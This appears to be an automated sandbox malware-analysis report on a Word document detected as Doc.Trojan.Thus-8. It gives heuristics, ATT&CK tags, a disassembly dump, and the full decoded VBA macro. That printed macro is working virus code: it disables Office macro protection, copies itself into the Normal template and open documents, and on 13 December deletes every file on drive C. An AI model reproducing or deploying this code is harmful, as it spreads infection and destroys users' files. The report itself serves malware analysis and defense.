MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1553.005 Security Software Installation
The sample contains VBA macros that attempt to disable macro security and replicate the macro code to other documents, including the Normal template. This behavior is indicative of a self-propagating macro-based malware. The ClamAV detection 'Doc.Trojan.Thus-8' further supports its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.Thus-8 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Thus-8
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() 'Thus_001' -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x07 bytes found
Disassembly
Attempted x86 opcode disassembly000018DC 07 pop es 000018DD 07 pop es 000018DE 07 pop es 000018DF 07 pop es 000018E0 07 pop es 000018E1 07 pop es 000018E2 07 pop es 000018E3 07 pop es 000018E4 07 pop es 000018E5 07 pop es 000018E6 07 pop es 000018E7 07 pop es 000018E8 07 pop es 000018E9 07 pop es 000018EA 07 pop es 000018EB 07 pop es 000018EC 07 pop es 000018ED 07 pop es 000018EE 07 pop es 000018EF 07 pop es 000018F0 07 pop es 000018F1 07 pop es 000018F2 07 pop es 000018F3 07 pop es 000018F4 07 pop es 000018F5 07 pop es 000018F6 07 pop es 000018F7 07 pop es 000018F8 07 pop es 000018F9 07 pop es 000018FA 07 pop es 000018FB 07 pop es 000018FC 07 pop es 000018FD 07 pop es 000018FE 07 pop es 000018FF 07 pop es 00001900 07 pop es 00001901 07 pop es 00001902 07 pop es 00001903 07 pop es 00001904 07 pop es 00001905 07 pop es 00001906 07 pop es 00001907 07 pop es 00001908 07 pop es 00001909 07 pop es 0000190A 07 pop es 0000190B 07 pop es 0000190C 07 pop es 0000190D 07 pop es 0000190E 07 pop es 0000190F 07 pop es 00001910 07 pop es 00001911 07 pop es 00001912 07 pop es 00001913 07 pop es 00001914 07 pop es 00001915 07 pop es 00001916 07 pop es 00001917 07 pop es 00001918 07 pop es 00001919 07 pop es 0000191A 07 pop es 0000191B 07 pop es 0000191C 07 pop es 0000191D 07 pop es 0000191E 07 pop es 0000191F 07 pop es 00001920 07 pop es 00001921 07 pop es 00001922 07 pop es 00001923 07 pop es 00001924 07 pop es 00001925 07 pop es 00001926 07 pop es 00001927 07 pop es 00001928 07 pop es 00001929 07 pop es 0000192A 07 pop es 0000192B 07 pop es 0000192C 07 pop es 0000192D 07 pop es 0000192E 07 pop es 0000192F 07 pop es 00001930 07 pop es 00001931 07 pop es 00001932 07 pop es 00001933 07 pop es 00001934 07 pop es 00001935 07 pop es 00001936 07 pop es 00001937 07 pop es 00001938 07 pop es 00001939 07 pop es 0000193A 07 pop es 0000193B 07 pop es
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2374 bytes |
SHA-256: 06d8b38a317377d80acbc28cd178ec410ded92e796ab90457409f9756b921d85 |
|||
|
Detection
ClamAV:
Doc.Trojan.Thus-8
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
.CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
.CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
.Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.DeleteLines 1, Application.Documents.Item(k) _
.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
.VBComponents.Item(1).CodeModule.CountOfLines)
End If
Next k
If (Day(Now()) = 13) And (Month(Now()) = 12) Then
With Application.FileSearch
.NewSearch
.LookIn = "C:\"
.SearchSubFolders = True
.FileName = "*.*"
.MatchTextExactly = False
.FileType = msoFileTypeAllFiles
If .Execute > 0 Then
For i = 1 To .FoundFiles.Count
Kill .FoundFiles(i)
Next i
End If
End With
End If
End Sub
Private Sub Document_Close()
Document_Open
End Sub
Private Sub Document_New()
Document_Open
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.